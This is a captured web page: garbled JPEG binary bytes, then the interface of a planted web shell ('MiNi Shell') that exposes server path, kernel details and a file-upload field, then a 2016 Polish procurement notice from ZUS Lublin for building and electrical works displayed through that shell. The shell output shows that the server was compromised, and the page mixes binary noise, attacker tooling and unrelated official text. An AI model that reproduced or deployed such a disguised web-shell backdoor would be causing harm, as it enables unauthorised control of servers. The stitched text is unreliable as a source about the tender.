JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160405/77240-N-2016.html

<p class="kh_header"><b>Lublin: Roboty budowlano-instalacyjne w obiektach Oddziału ZUS    w Lublinie 
przy ulicy Tomasza Zana 38A i 38C</b><br>
<b>Numer ogłoszenia: 77240 - 2016; data zamieszczenia: 05.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Lublinie , ul. Tomasza Zana 36,38c, 20-601 Lublin, woj. lubelskie, tel. 081 5357402, faks 081 5357402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlano-instalacyjne w obiektach Oddziału ZUS    w Lublinie 
przy ulicy Tomasza Zana 38A i 38C.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia, o wartości szacunkowej poniżej 5 225 000 EURO,  są roboty budowlano-instalacyjne w obiektach Oddziału ZUS   w Lublinie przy ulicy Tomasza Zana 38A i 38C. Przedmiot zamówienia podzielony został na dwie nw. części :

1.1 Część nr 1, w skład której wchodzą dwa zadania pn.:
a)Zadanie nr 1 pn. Przebudowa fragmentu budynku Oddziału ZUS w Lublinie przy ulicy Tomasza Zana 38A w Lublinie dla potrzeb archiwum zakładowego. 
Zadanie to  obejmuje  również  utrzymanie zainstalowanych urządzeń klimatyzacyjno-wentylacyjnych, podnośnika nożycowego oraz systemów: sygnalizacji pożaru i sygnalizacji włamania i napadu w stałej sprawności technicznej  w okresie gwarancji, w szczególności poprzez świadczenie wymaganych stosownymi przepisami prawa i zaleceniami producenta, usług serwisu gwarancyjnego. 
b)Zadanie nr 2 pn. Remont głównej rozdzielni elektrycznej w budynku Oddziału ZUS  w Lublinie przy ulicy Tomasza Zana 38A.

 1.2  Część nr 2 pn. Remont głównej rozdzielni elektrycznej w budynku Oddziału ZUS w Lublinie przy ulicy Tomasza Zana 38C.
Zamówienie, objęte tą częścią,   realizowane będzie  z mocy art. 16 ustawy - Prawo zamówień publicznych, jako zamówienie wspólne na podstawie  Porozumienia współudziałowców budynku przy ulicy T. Zana 38C w Lublinie. W przedmiotowym porozumieniu   nw. współudziałowcy wyznaczyli ZUS O/Lublin jako Zamawiającego upoważnionego do przeprowadzenia postępowania i udzielenia zamówienia   w ich imieniu i na ich rzecz. Stronami porozumienia są:
a) Samorządowe Kolegium Odwoławcze w Lublinie;
b) Inspekcja Handlowa, Wojewódzki Inspektorat w Lublinie;
c)Urząd Komunikacji Elektronicznej w Lublinie;
d)Orange Polska S.A. w Warszawie;
e)Zakład Ubezpieczeń Społecznych, Oddział w Lublinie
2.Zamawiający   dopuszcza możliwość   składania  ofert częściowych na część nr 1 lub nr 2 lub na obie części przedmiotu zamówienia;

  Uwaga!  Wszystkie postanowienia  ogłoszenia dotyczą każdej części, chyba  że treść postanowienia stanowi naczej.

3.Wymagane jest wniesienie wadium w kwocie:  na  część nr 1 -  16 800,00 zł (słownie: szesnaście tysięcy osiemset   00/100 zł);  na część nr 2 - 5 000,00 zł (słownie: pięć tysięcy 00/100 zł).

4.Termin realizacji zamówienia : 
 4.1. Rozpoczęcie realizacji przedmiotu zamówienia nastąpi z chwilą podpisania protokołu przekazania miejsca wykonywania robót
 4.2.  Przekazanie Placu budowy nastąpi w terminie do 7 dni roboczych, licząc od daty podpisania umowy.
 4.3.  Zakończenie realizacji przedmiotu zamówienia nastąpi nie później niż:
a)do dnia 14.10.2016 roku -  część nr 1,  zadanie nr 1;
b)do dnia 20.09.2016 roku - część nr 1,  zadanie nr 2;
c)do dnia 20.09.2016 roku - część nr 2,
 4.4. Za dzień zakończenia realizacji przedmiotu zamówienia uważa się dzień podpisania przez Strony  bezusterkowego protokołu odbioru końcowego robót.
 4.5. Szczegółowe terminy realizacji przedmiotu umowy zawierają harmonogramy rzeczowo-finansowe.

5.Dokładny  zakres i warunki realizacji przedmiotu zamówienia opisane są  w Specyfikacji Istotnych Warunków Zamówienia (SIWZ) a w szczególności  w  dokumentacji projektowej i Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych (STWiORB), stanowiących  integralną część SIWZ. 

6. Wykonawca wykona przedmiot zamówienia zgodnie  z dokumentacją projektową, Specyfikacją Istotnych Warunków Zamówienia (SIWZ), złożoną ofertą, harmonogramem rzeczowo-finansowym, a także obowiązującymi przepisami Prawa budowlanego oraz normami technicznymi.

7.WSPÓLNY SŁOWNIK ZAMÓWIEŃ: Kody CPV: 45-00-00-00-7  Roboty budowlane, 45-40-00-00-1  Wykończeniowe roboty budowlane,  45-31-00-00-3  Roboty instalacyjne elektryczne , 45-33-00-00-9  Wykonywanie instalacji cieplnych, wodnych, wentylacyjnych i gazowych.

8.   Nie dopuszcza się możliwości składania ofert  wariantowych  w rozumieniu art. 2 pkt 7 ustawy    z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2015 r. poz. 2164),  zwanej dalej  ustawą.

9.   Nie przewiduje się zamówień  uzupełniających, o których mowa w art. 67 ust.  1 pkt 6   i 7 lub   art. 134 ust. 6 pkt 3 i 4 ustawy.

10.  Zamawiający dopuszcza możliwość  dokonywania zmian istotnych postanowień zawartej umowy   w stosunku do treści oferty jedynie w zakresie opisanym w SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.31.00.00-3, 45.33.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagane jest wniesienie wadium w kwocie:  na  część nr 1 -  16 800,00 zł (słownie: szesnaście tysięcy osiemset   00/100 zł);  na część nr 2 - 5 000,00 zł (słownie: pięć tysięcy 00/100 zł).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań w zakresie tego warunku.
Na potwierdzenie spełniania warunku Wykonawca zobowiązany jest złożyć oświadczenie, że spełnia warunki zawarte w art. 22 ust. 1  pkt 1 ustawy (według zał. do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca należycie  zrealizował,  w okresie ostatnich pięciu lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  dwa zamówienia, odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia, realizowane  na podstawie odrębnych umów,  przy czym każda umowa obejmowała co najmniej jedną robotę związaną z budową lub remontem rozdzielni elektrycznej, a łączna wartość brutto tych robót wynosiła minimum 200 000,00  złotych - dla części nr 1 i 100 000,00 tysięcy złotych dla części nr 2. 

Na potwierdzenie spełniania tego warunku Wykonawca złoży wykaz zamówień zawierających roboty budowlano-instalacyjne  (wg. wzoru załączonego do SIWZ) spełniających powyższy opis, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości oraz daty i miejsca wykonywania, a także załączy dokumenty  potwierdzające, że roboty  objęte zamówieniami zawartymi  w wykazie zostały   wykonane  zgodnie z zasadami sztuki budowlanej  i terminowo ukończone. 
                     (W przypadku składania oferty przez jednego wykonawcę na obie części zamówienia, wykonawca może wskazać te same roboty podobne , o wartości wymaganej dla części nr 1,  w ofercie na każdą  część przedmiotu zamówienia i sporządzić jeden wykaz robót podobnych). 

  W przypadku, gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów 

Ponadto Wykonawca zobowiązany jest złożyć oświadczenie, że spełnia warunki zawarte w art. 22 ust. 1  pkt 2 ustawy (według zał. do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań w zakresie tego warunku.
Na potwierdzenie spełniania warunku Wykonawca zobowiązany jest złożyć oświadczenie, że spełnia warunki zawarte w art. 22 ust. 1  pkt 3 ustawy (według zał. do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli  wykonawca:
1) dysponuje osobami,  zdolnymi do pełnienia funkcji kierowników robót, które posiadają uprawnienia budowlane w niżej wymienionych specjalnościach zawodowych (co najmniej po jednej osobie w każdej specjalności):
a) specjalności konstrukcyjno-budowlanej bez ograniczeń,
b) specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych    i elektroenergetycznych bez ograniczeń,
c) specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń

2) dysponuje co najmniej dwoma osobami, które będą wykonywać zamówienie, posiadającymi świadectwo kwalifikacji uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci do 1kV, na stanowisku eksploatacji ,
3) dysponuje co najmniej jedną osobą, która będzie wykonywać zamówienie, posiadającą świadectwo kwalifikacji uprawniające do zajmowania się eksploatacją urządzeń, instalacji i cieci do 1kV, na stanowisku dozoru.
(W przypadku składania oferty przez jednego wykonawcę na obie  części zamówienia, wykonawca może wskazać te same osoby w ofercie na każdą  część przedmiotu zamówienia  i sporządzić jeden wykaz).

Na potwierdzenie spełniania tego warunku Wykonawca złoży wykaz osób,  które będą uczestniczyć w wykonywaniu zamówienia (wg załączonego wzoru do SIWZ), wraz z informacjami na temat ich kwalifikacji zawodowych,  niezbędnych do wykonania zamówienia, także zakresu wykonywanych przez  nie czynności, oraz informacją o podstawie do dysponowania tymi osobami a także oświadczenie, że osoby wymienione w wykazie posiadają wymagane uprawnienia.  Wykaz musi zawierać osoby spełniające wyżej opisane warunki.

Ponadto Wykonawca zobowiązany jest złożyć oświadczenie, że spełnia warunki zawarte w art. 22 ust. 1  pkt 3 ustawy (według zał. do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca posiada środki finansowe lub zdolność kredytową w kwocie równej co najmniej: część nr 1 - 180 000,00 zł ; cześć nr 2 - 80 000,00 zł . 
 (W przypadku składania oferty przez jednego wykonawcę na obie  części zamówienia, wykonawca musi wykazać się środkami lub zdolnością finansową w kwocie co najmniej 260 000,00 zł).

Na potwierdzenie spełniania tego warunku Wykonawca złoży informacji banku lub spółdzielczej kasy oszczędnościowo- kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność  kredytową wykonawcy                w wysokości wyżej opisanej wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
UWAGA! Informacja o stanie salda na rachunku bankowym nie jest informacją spełniającą wymaganie Zamawiającego chyba, że będzie to saldo dostępne.  


Ponadto Wykonawca zobowiązany jest złożyć oświadczenie, że spełnia warunki zawarte w art. 22 ust. 1  pkt 4 ustawy (według zał. do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Na podstawie § 1 ust. 4 Rozporządzenia PRM z dnia  19 lutego 2013r.   w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz. U. z 2013r. poz. 231), Zamawiający wymaga wskazania w ww. wykazie co najmniej dwóch robót spełniajacych wymagania opisane w pkt. III.3.2) ogłoszenia  i dołączenia  dowodów*  dotyczących wskazanych  robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone.
    * dowodami  są poświadczenia lub inne dokumenty, jeżeli z uzasadnionych przyczyn   o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli wykonawca nie spełnia samodzielnie warunków udziału w postępowaniu    a  wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach (wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach ekonomicznych i finansowych)  innych podmiotów na zasadach określonych w art. 26 ust.2b ustawy, zobowiązany jest udowodnić Zamawiającemu,  że będzie dysponował zasobami niezbędnymi do realizacji zamówienia przez cały okres jego realizacji, w szczególności załączając do oferty pisemne zobowiązanie tych podmiotów (oryginał)  do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia i na okres korzystania z nich przy wykonywaniu zamówienia.  Z treści zobowiązania lub innych dokumentów dołączonych do oferty ma wynikać m.in. zakres dostępnych wykonawcy zasobów innego podmiotów,  sposób wykorzystania zasobów innego podmiotu przy wykonywaniu zamówienia oraz zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia. Zamawiający tylko wówczas będzie mógł uznać zdolność wykonawcy do realizacji zamówienia, gdy wykonawca wykaże, poprzez treść przedstawionych dokumentów, realny sposób, w jaki jest przewidziane korzystanie  z zasobów podmiotu trzeciego   w czasie realizacji zamówienia, a zatem realny sposób w jaki podmiot trzeci gwarantuje wykonawcy rzeczywisty dostęp do swojego potencjału w stopniu niezbędnym dla należytego wykonania zamówienia. 
   Podmiot trzeci, który zobowiązał się do udostępnienia wykonawcy swoich zasobów  w celu wykazania się przez wykonawcę zdolnością do realizacji zamówienia,  na podstawie art. 26 ust. 2b ustawy, będzie ponosił solidarną odpowiedzialność wraz z wykonawcą za szkodę zamawiającego powstałą na skutek nieudostępnienia zasobów. Podmiot trzeci nie będzie ponosił solidarnej odpowiedzialności tylko wówczas, gdy nieudostępnienie zasobów nie było przez niego zawinione np. gdy wykonawca realizował zamówienie przy udziale innych zasobów mimo gotowości udostępnienia ich przez podmiot trzeci.
W przypadku polegania na zasobach innych podmiotów, spełnianie warunków  udziału  w postępowaniu,  o których mowa  w pkt. III.3 ogłoszenia,   będzie oceniane łącznie (wykonawca i inny podmiot);

2. Jeżeli wykonawca, wykazując spełnianie warunków udziału w postępowaniu , o których mowa  w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych    w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, wykonawca jest zobowiązany złożyć wraz z ofertą w odniesieniu do tych podmiotów dokumenty wymienione   w pkt. III.4.2)  tiret 2 i 4;

3.  Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy 
w sprawie zamówienia publicznego.
3.1.  Wykonawcy, o których mowa powyżej, składają jedną ofertę, przy czym:
a) wymagane oświadczenia i dokumenty wskazane w pkt II  składa każdy z Wykonawców;
b) oświadczenie potwierdzające spełnianie warunków określonych w art. 22 ust. 1 ustawy, składają wykonawcy wspólnie
c) pozostałe wymagane  dokumenty składają wszyscy wykonawcy wspólnie.

